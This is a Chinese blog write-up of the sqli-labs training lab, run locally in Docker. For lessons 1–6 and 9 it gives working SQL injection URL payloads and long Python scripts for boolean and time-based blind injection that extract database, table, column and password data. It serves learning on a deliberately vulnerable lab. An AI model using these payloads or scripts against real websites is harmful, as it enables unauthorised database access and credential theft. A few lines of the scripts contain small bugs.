sqli-lab
前言
学了一段时间的web了,最近决定把几个靶场打一打,比如说sql注入,SSTI,XXE,XSS啥的。靶场的搭建采用docker直接pull的方式,简单又快捷,五分钟即可进入靶场,谁用谁知道。
sqli-labs
less 1
字符型注入,直接打:
payload:
- 判断字符型注入:
http://127.0.0.1/Less-1/?id=1%27%20and%201=1%23 正常回显
http://127.0.0.1/Less-1/?id=1%27%20and%201=2%23 无回显
判断为字符型注入 - 判断字段数:
http://127.0.0.1/Less-1/?id=1%27%20order%20by%203%23 正常回显
http://127.0.0.1/Less-1/?id=1%27%20order%20by%204%23 报错:Unknown column ‘4’ in ‘order clause’
字段数为3 - 查库名:
http://127.0.0.1/Less-1/?id=-1%27%20union%20select%201,2,database()%23
得到库名为security - 查表名:
http://127.0.0.1/Less-1/?id=-1%27%20union%20select%201,2,group_concat(table_name)%20from%20information_schema.tables%20where%20table_schema=database()%23
得到表名为emails,referers,uagents,users - 查字段名:
http://127.0.0.1/Less-1/?id=-1%27%20union%20select%201,2,group_concat(column_name)%20from%20information_schema.columns%20where%20table_schema=database()%20and%20table_name=%27users%27%23
以表users为例,得到users表有三个字段:id,username,password - 查字段值:
http://127.0.0.1/Less-1/?id=-1%27%20union%20select%201,2,group_concat(id,username,password)%20from%20users%23
同时查三个字段的所有数据less 2
数字型注入,也是直接打:
payload:
- 判断数字型注入:
http://127.0.0.1/Less-2/?id=1%20and%201=1 正常回显
http://127.0.0.1/Less-2/?id=1%20and%201=2 无回显 - 判断字段数:
http://127.0.0.1/Less-2/?id=1%20order%20by%203 正常回显
http://127.0.0.1/Less-2/?id=1%20order%20by%204 报错:Unknown column ‘4’ in ‘order clause’
字段数为3 - 查库名:
http://127.0.0.1/Less-2/?id=-1%20union%20select%201,2,database()
得到库名为security - 查表名:
http://127.0.0.1/Less-2/?id=-1%20union%20select%201,2,group_concat(table_name)%20from%20information_schema.tables%20where%20table_schema=database()
得到表名为emails,referers,uagents,users - 查字段名:
http://127.0.0.1/Less-2/?id=-1%20union%20select%201,2,group_concat(column_name)%20from%20information_schema.columns%20where%20table_schema=database()%20and%20table_name=%27users%27
以表users为例,得到users表有三个字段:id,username,password 查字段值:
http://127.0.0.1/Less-2/?id=-1%20union%20select%201,2,group_concat(id,username,password)%20from%20users
同时查三个字段的所有数据less 3
变形的字符型注入,根据报错信息可以得到id被(‘’)包起来了,因此只需要将less 1的1’改为1’)即可
payload:判断字符型注入
http://127.0.0.1/Less-3/?id=1%27)%20and%201=1%23 正常回显
http://127.0.0.1/Less-3/?id=1%27)%20and%201=2%23 无回显- 判断字段数
http://127.0.0.1/Less-3/?id=1%27)%20order%20by%203%23 正常回显
http://127.0.0.1/Less-3/?id=1%27)%20order%20by%204%23 报错:Unknown column ‘4’ in ‘order clause’
字段数为3 - 查库名
http://127.0.0.1/Less-3/?id=-1%27)%20union%20select%201,2,database()%23
得到库名为security - 查表名
http://127.0.0.1/Less-3/?id=-1%27)%20union%20select%201,2,group_concat(table_name)%20from%20information_schema.tables%20where%20table_schema=database()%23
得到表名为:emails,referers,uagents,users - 查字段名:
http://127.0.0.1/Less-3/?id=-1%27)%20union%20select%201,2,group_concat(column_name)%20from%20information_schema.columns%20where%20table_schema=database()%20and%20table_name=%27users%27%23
以表users为例,得到users表有三个字段:id,username,password 查字段值:
http://127.0.0.1/Less-3/?id=-1%27)%20union%20select%201,2,group_concat(id,username,password)%20from%20users%23
同时查三个字段的所有数据less 4
双引号闭合加上括号的变种
payload:判断字符型注入
http://127.0.0.1/Less-4/?id=1%22)%20and%201=1%23 正常回显
http://127.0.0.1/Less-4/?id=1%22)%20and%201=2%23 无回显- 判断字段数
http://127.0.0.1/Less-4/?id=1%22)%20%20order%20by%203%23 正常回显
http://127.0.0.1/Less-4/?id=1%22)%20%20order%20by%204%23 报错:Unknown column ‘4’ in ‘order clause’
字段数为3 - 查库名
http://127.0.0.1/Less-4/?id=-1%22)%20union%20select%201,2,database()%23
得到库名为security - 查表名
http://127.0.0.1/Less-4/?id=-1%22)%20union%20select%201,2,group_concat(table_name)%20from%20information_schema.tables%20where%20table_schema=database()%23
得到表名为:emails,referers,uagents,users - 查字段名
http://127.0.0.1/Less-4/?id=-1%22)%20union%20select%201,2,group_concat(column_name)%20from%20information_schema.columns%20where%20table_schema=database()%20and%20table_name=%27users%27%23
以表users为例,得到users表有三个字段:id,username,password - 查字段值
http://127.0.0.1/Less-4/?id=-1%22)%20union%20select%201,2,group_concat(id,username,password)%20from%20users%23
同时查三个字段的所有数据less 5
盲注,注入过程如下:
payload:
- 判断盲注
http://127.0.0.1/Less-5/?id=1%27%20and%201=1%23 回显You are in
http://127.0.0.1/Less-5/?id=1%27%20and%201=2%23 无回显
判断为盲注
爆库名长度、爆库名、爆表名长度、爆表名、爆字段长度、爆字段、爆数据长度、爆数据,脚本如下:1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192from requests import *
url="http://127.0.0.1/Less-5/"
def get_db_len(url): #获取当前数据库长度
left=0
right=100
while left<right:
mid=(left+right)//2
payload=url+f"?id=1' and length(database())>{mid}%23"
response=get(payload)
if 'You are in' in response.text:
left=mid+1
else:
right=mid
judge=url+f"?id=1' and length(database())={left}%23"
response=get(judge)
if 'You are in' in response.text:
mid=left
else:
mid=right
return mid
def get_table_len(url,index): #获取当前数据库第index个表的长度
left=0
right=100
while left<right:
mid=(left+right)//2
payload=url+f"?id=1' and length((select table_name from information_schema.tables where table_schema=database() limit {index},1))>{mid}%23"
response=get(payload)
if 'You are in' in response.text:
left=mid+1
else:
right=mid
judge=url+f"?id=1' and length((select table_name from information_schema.tables where table_schema=database() limit {index},1))={left}%23"
response=get(judge)
if 'You are in' in response.text:
mid=left
else:
mid=right
return mid
def get_column_len(url,index1,index2): #获取数据库第index1个表的第index2个字段的长度
left=0
right=100
table_name=get_table_name(url,index1)
while left<right:
mid=(left+right)//2
payload=url+f"?id=1' and length((select column_name from information_schema.columns where table_name='{table_name}' limit {index2},1))>{mid}%23"
response=get(payload)
if 'You are in' in response.text:
left=mid+1
else:
right=mid
judge=url+f"?id=1' and length((select column_name from information_schema.columns where table_name='{table_name}' limit {index2},1))={left}%23"
response=get(judge)
if 'You are in' in response.text:
mid=left
else:
mid=right
return mid
def get_data_len(url,index1,index2,index3): ##获取数据库第index1个表的第index2个字段的第index3个数据
table_name=get_table_name(url,index1)
column_name=get_column_name(url,index1,index2)
left=0
right=100
while left<right:
mid=(left+right)//2
payload=url+f"?id=1' and length((select {column_name} from {table_name} limit {index3},1))>{mid}%23"
response=get(payload)
if 'You are in' in response.text:
left=mid+1
else:
right=mid
judge=url+f"?id=1' and length((select {column_name} from {table_name} limit {index3},1))={left}%23"
response=get(judge)
if 'You are in' in response.text:
mid=left
else:
mid=right
return mid
def get_db_name(url,db_len): #获取当前数据库名
db_name=''
for i in range(1,db_len+1):
left=32
right=128
while left<right:
mid=(left+right)//2
payload=url+f"?id=1' and ascii(substr((select database()),{i},1))>{mid}%23"
response=get(payload)
if 'You are in' in response.text:
left=mid+1
else:
right=mid
judge=url+f"?id=1' and ascii(substr((select database()),{i},1))={left}%23"
response=get(judge)
if 'You are in' in response.text:
mid=left
else:
mid=right
db_name+=chr(mid)
return db_name
def get_table_name(url,index): #获取第index个数据表表名
table_len=get_table_len(url,index)
table_name=''
for i in range(1,table_len+1):
left=32
right=128
while left<right:
mid=(left+right)//2
payload=url+f"?id=1' and ascii(substr((select table_name from information_schema.tables where table_schema=database() limit {index},1),{i},1))>{mid}%23"
response=get(payload)
if 'You are in' in response.text:
left=mid+1
else:
right=mid
judge=url+f"?id=1' and ascii(substr((select table_name from information_schema.tables where table_schema=database() limit {index},1),{i},1)={left}%23"
response=get(judge)
if 'You are in' in response.text:
mid=left
else:
mid=right
table_name+=chr(mid)
return table_name
def get_column_name(url,index1,index2): #获取数据库第index1个表的第index2个字段的长度
column_len=get_column_len(url,index1,index2)
table_name=get_table_name(url,index1)
column_name=''
for i in range(1,column_len+1):
left=32
right=128
while left<right:
mid=(left+right)//2
payload=url+f"?id=1' and ascii(substr((select column_name from information_schema.columns where table_name='{table_name}' limit {index2},1),{i},1))>{mid}%23"
response=get(payload)
if 'You are in' in response.text:
left=mid+1
else:
right=mid
judge=url+f"?id=1' and ascii(substr((select column_name from information_schema.columns where table_name='{table_name}' limit {index2},1),{i},1))={left}%23"
response=get(judge)
if 'You are in' in response.text:
mid=left
else:
mid=right
column_name+=chr(mid)
return column_name
def get_data(url,index1,index2,index3): #获取数据库第index1个表的第index2个字段的第index3个数据
data_len=get_data_len(url,index1,index2,index3)
column_name=get_column_name(url,index1,index2)
table_name=get_table_name(url,index1)
data=''
for i in range(1,data_len+1):
left=32
right=128
while left<right:
mid=(left+right)//2
payload=url+f"?id=1' and ascii(substr((select {column_name} from {table_name} limit {index3},1),{i},1))>{mid}%23"
response=get(payload)
if 'You are in' in response.text:
left=mid+1
else:
right=mid
judge=url+f"?id=1' and ascii(substr((select {column_name} from {table_name} limit {index3},1),{i},1))={left}%23"
response=get(judge)
if 'You are in' in response.text:
mid=left
else:
mid=right
data+=chr(mid)
return data
index1=3
index2=2
index3=1
print(get_db_name(url,get_db_len(url)))
print(get_table_name(url,index1))
print(get_column_name(url,index1,index2))
print(get_data(url,index1,index2,index3))
'''
security
users
password
p@ssword
'''less 6
less 5的单引号变成双引号,直接上脚本:1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191from requests import *
url="http://127.0.0.1/Less-6/"
def get_db_len(url): #获取当前数据库长度
left=0
right=100
while left<right:
mid=(left+right)//2
payload=url+f"?id=1\" and length(database())>{mid}%23"
response=get(payload)
if 'You are in' in response.text:
left=mid+1
else:
right=mid
judge=url+f"?id=1\" and length(database())={left}%23"
response=get(judge)
if 'You are in' in response.text:
mid=left
else:
mid=right
return mid
def get_table_len(url,index): #获取当前数据库第index个表的长度
left=0
right=100
while left<right:
mid=(left+right)//2
payload=url+f"?id=1\" and length((select table_name from information_schema.tables where table_schema=database() limit {index},1))>{mid}%23"
response=get(payload)
if 'You are in' in response.text:
left=mid+1
else:
right=mid
judge=url+f"?id=1\" and length((select table_name from information_schema.tables where table_schema=database() limit {index},1))={left}%23"
response=get(judge)
if 'You are in' in response.text:
mid=left
else:
mid=right
return mid
def get_column_len(url,index1,index2): #获取数据库第index1个表的第index2个字段的长度
left=0
right=100
table_name=get_table_name(url,index1)
while left<right:
mid=(left+right)//2
payload=url+f"?id=1\" and length((select column_name from information_schema.columns where table_name='{table_name}' limit {index2},1))>{mid}%23"
response=get(payload)
if 'You are in' in response.text:
left=mid+1
else:
right=mid
judge=url+f"?id=1\" and length((select column_name from information_schema.columns where table_name='{table_name}' limit {index2},1))={left}%23"
response=get(judge)
if 'You are in' in response.text:
mid=left
else:
mid=right
return mid
def get_data_len(url,index1,index2,index3): ##获取数据库第index1个表的第index2个字段的第index3个数据
table_name=get_table_name(url,index1)
column_name=get_column_name(url,index1,index2)
left=0
right=100
while left<right:
mid=(left+right)//2
payload=url+f"?id=1\" and length((select {column_name} from {table_name} limit {index3},1))>{mid}%23"
response=get(payload)
if 'You are in' in response.text:
left=mid+1
else:
right=mid
judge=url+f"?id=1\" and length((select {column_name} from {table_name} limit {index3},1))={left}%23"
response=get(judge)
if 'You are in' in response.text:
mid=left
else:
mid=right
return mid
def get_db_name(url,db_len): #获取当前数据库名
db_name=''
for i in range(1,db_len+1):
left=32
right=128
while left<right:
mid=(left+right)//2
payload=url+f"?id=1\" and ascii(substr((select database()),{i},1))>{mid}%23"
response=get(payload)
if 'You are in' in response.text:
left=mid+1
else:
right=mid
judge=url+f"?id=1\" and ascii(substr((select database()),{i},1))={left}%23"
response=get(judge)
if 'You are in' in response.text:
mid=left
else:
mid=right
db_name+=chr(mid)
return db_name
def get_table_name(url,index): #获取第index个数据表表名
table_len=get_table_len(url,index)
table_name=''
for i in range(1,table_len+1):
left=32
right=128
while left<right:
mid=(left+right)//2
payload=url+f"?id=1\" and ascii(substr((select table_name from information_schema.tables where table_schema=database() limit {index},1),{i},1))>{mid}%23"
response=get(payload)
if 'You are in' in response.text:
left=mid+1
else:
right=mid
judge=url+f"?id=1\" and ascii(substr((select table_name from information_schema.tables where table_schema=database() limit {index},1),{i},1)={left}%23"
response=get(judge)
if 'You are in' in response.text:
mid=left
else:
mid=right
table_name+=chr(mid)
return table_name
def get_column_name(url,index1,index2): #获取数据库第index1个表的第index2个字段的长度
column_len=get_column_len(url,index1,index2)
table_name=get_table_name(url,index1)
column_name=''
for i in range(1,column_len+1):
left=32
right=128
while left<right:
mid=(left+right)//2
payload=url+f"?id=1\" and ascii(substr((select column_name from information_schema.columns where table_name='{table_name}' limit {index2},1),{i},1))>{mid}%23"
response=get(payload)
if 'You are in' in response.text:
left=mid+1
else:
right=mid
judge=url+f"?id=1\" and ascii(substr((select column_name from information_schema.columns where table_name='{table_name}' limit {index2},1),{i},1))={left}%23"
response=get(judge)
if 'You are in' in response.text:
mid=left
else:
mid=right
column_name+=chr(mid)
return column_name
def get_data(url,index1,index2,index3): #获取数据库第index1个表的第index2个字段的第index3个数据
data_len=get_data_len(url,index1,index2,index3)
column_name=get_column_name(url,index1,index2)
table_name=get_table_name(url,index1)
data=''
for i in range(1,data_len+1):
left=32
right=128
while left<right:
mid=(left+right)//2
payload=url+f"?id=1\" and ascii(substr((select {column_name} from {table_name} limit {index3},1),{i},1))>{mid}%23"
response=get(payload)
if 'You are in' in response.text:
left=mid+1
else:
right=mid
judge=url+f"?id=1\" and ascii(substr((select {column_name} from {table_name} limit {index3},1),{i},1))={left}%23"
response=get(judge)
if 'You are in' in response.text:
mid=left
else:
mid=right
data+=chr(mid)
return data
index1=3
index2=2
index3=2
print(get_db_name(url,get_db_len(url)))
print(get_table_name(url,index1))
print(get_column_name(url,index1,index2))
print(get_data(url,index1,index2,index3))
'''security
users
password
p@ssword
'''
less 9
时间盲注,大致思路与布尔盲注差不多,只需要修改一下payload就行,脚本:1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
205
206
207
208
209
210
211
212
213
214
215
216
217
218
219
220
221
222
223
224from requests import *
from time import time
url="http://127.0.0.1/Less-9/"
def get_db_len(url): #获取当前数据库长度
left=0
right=100
while left<right:
mid=(left+right)//2
payload=url+f"?id=1' and if(length(database())>{mid},sleep(0.1),0)%23"
before=time()
response=get(payload)
after=time()
if after-before>=0.1:
left=mid+1
else:
right=mid
t1=time()
judge=url+f"?id=1' and if(length(database())={left},sleep(0.1),0)%23"
response=get(judge)
t2=time()
if t2-t1>=0.1:
mid=left
else:
mid=right
return mid
def get_table_len(url,index): #获取当前数据库第index个表的长度
left=0
right=100
while left<right:
mid=(left+right)//2
t1=time()
payload=url+f"?id=1' and if(length((select table_name from information_schema.tables where table_schema=database() limit {index},1))>{mid},sleep(0.1),0)%23"
response=get(payload)
t2=time()
if t2-t1>=0.1:
left=mid+1
else:
right=mid
t1=time()
judge=url+f"?id=1' and if(length((select table_name from information_schema.tables where table_schema=database() limit {index},1))={left},sleep(0.1),0)%23"
response=get(judge)
t2=time()
if t2-t1>=0.1:
mid=left
else:
mid=right
return mid
def get_column_len(url,index1,index2): #获取数据库第index1个表的第index2个字段的长度
left=0
right=100
table_name=get_table_name(url,index1)
while left<right:
mid=(left+right)//2
t1=time()
payload=url+f"?id=1' and if(length((select column_name from information_schema.columns where table_name='{table_name}' limit {index2},1))>{mid},sleep(0.1),0)%23"
response=get(payload)
t2=time()
if t2-t1:
left=mid+1
else:
right=mid
t1=time()
judge=url+f"?id=1' and if(length((select column_name from information_schema.columns where table_name='{table_name}' limit {index2},1))={left},sleep(0.1),0)%23"
response=get(judge)
t2=time()
if t2-t1>=0.1:
mid=left
else:
mid=right
return mid
def get_data_len(url,index1,index2,index3): ##获取数据库第index1个表的第index2个字段的第index3个数据
table_name=get_table_name(url,index1)
column_name=get_column_name(url,index1,index2)
left=0
right=100
while left<right:
mid=(left+right)//2
t1=time()
payload=url+f"?id=1' and if(length((select {column_name} from {table_name} limit {index3},1))>{mid},sleep(0.1),0)%23"
response=get(payload)
t2=time()
if t2-t1>=0.1:
left=mid+1
else:
right=mid
t1=time()
judge=url+f"?id=1' and if(length((select {column_name} from {table_name} limit {index3},1))={left},sleep(0.1),0)%23"
response=get(judge)
t2=time()
if t2-t1>=0.1:
mid=left
else:
mid=right
return mid
def get_db_name(url,db_len): #获取当前数据库名
db_name=''
for i in range(1,db_len+1):
left=32
right=128
while left<right:
mid=(left+right)//2
t1=time()
payload=url+f"?id=1' and if(ascii(substr((select database()),{i},1))>{mid},sleep(0.1),0)%23"
response=get(payload)
t2=time()
if t2-t1>=0.1:
left=mid+1
else:
right=mid
t1=time()
judge=url+f"?id=1' and if(ascii(substr((select database()),{i},1))={left},sleep(0,1),0)%23"
response=get(judge)
t2=time()
if t2-t1>=0.1:
mid=left
else:
mid=right
db_name+=chr(mid)
return db_name
def get_table_name(url,index): #获取第index个数据表表名
table_len=get_table_len(url,index)
table_name=''
for i in range(1,table_len+1):
left=32
right=128
while left<right:
mid=(left+right)//2
t1=time()
payload=url+f"?id=1' and if(ascii(substr((select table_name from information_schema.tables where table_schema=database() limit {index},1),{i},1))>{mid},sleep(0.1),0)%23"
response=get(payload)
t2=time()
if t2-t1>=0.1:
left=mid+1
else:
right=mid
t1=time()
judge=url+f"?id=1' and if(ascii(substr((select table_name from information_schema.tables where table_schema=database() limit {index},1),{i},1)={left},sleep(0.1),0)%23"
response=get(judge)
t2=time()
if t2-t1>=0.1:
mid=left
else:
mid=right
table_name+=chr(mid)
return table_name
def get_column_name(url,index1,index2): #获取数据库第index1个表的第index2个字段的长度
column_len=get_column_len(url,index1,index2)
table_name=get_table_name(url,index1)
column_name=''
for i in range(1,column_len+1):
left=32
right=128
while left<right:
mid=(left+right)//2
t1=time()
payload=url+f"?id=1' and if(ascii(substr((select column_name from information_schema.columns where table_name='{table_name}' limit {index2},1),{i},1))>{mid},sleep(0.1),0)%23"
response=get(payload)
t2=time()
if t2-t1>=0.1:
left=mid+1
else:
right=mid
t1=time()
judge=url+f"?id=1' and if(ascii(substr((select column_name from information_schema.columns where table_name='{table_name}' limit {index2},1),{i},1))={left},sleep(0.1),0)%23"
response=get(judge)
t2=time()
if t2-t1>=0.1:
mid=left
else:
mid=right
column_name+=chr(mid)
return column_name
def get_data(url,index1,index2,index3): #获取数据库第index1个表的第index2个字段的第index3个数据
data_len=get_data_len(url,index1,index2,index3)
column_name=get_column_name(url,index1,index2)
table_name=get_table_name(url,index1)
data=''
for i in range(1,data_len+1):
left=32
right=128
while left<right:
mid=(left+right)//2
t1=time()
payload=url+f"?id=1' and if(ascii(substr((select {column_name} from {table_name} limit {index3},1),{i},1))>{mid},sleep(0.1),0)%23"
response=get(payload)
t2=time()
if t2-t1>=0.1:
left=mid+1
else:
right=mid
t1=time()
judge=url+f"?id=1' and if(ascii(substr((select {column_name} from {table_name} limit {index3},1),{i},1))={left},sleep(0.1),0)%23"
response=get(judge)
t2=time()
if t2-t1>=0.1:
mid=left
else:
mid=right
data+=chr(mid)
return data
index1=3
index2=2
index3=2
print(get_db_name(url,get_db_len(url)))
print(get_table_name(url,index1))
print(get_column_name(url,index1,index2))
print(get_data(url,index1,index2,index3))
'''
security
users
password
p@ssword
'''
结语
sqli-lab的初步学习暂时就到这里,等以后学深了再学一学后面的cookie注入和二次注入吧。sql注入的入门暂时告一段落,接下来还会推出SSTI,XSS,XXE等靶场的入门文章。
本博客所有文章除特别声明外,均采用 CC BY-SA 4.0 协议 ,转载请注明出处!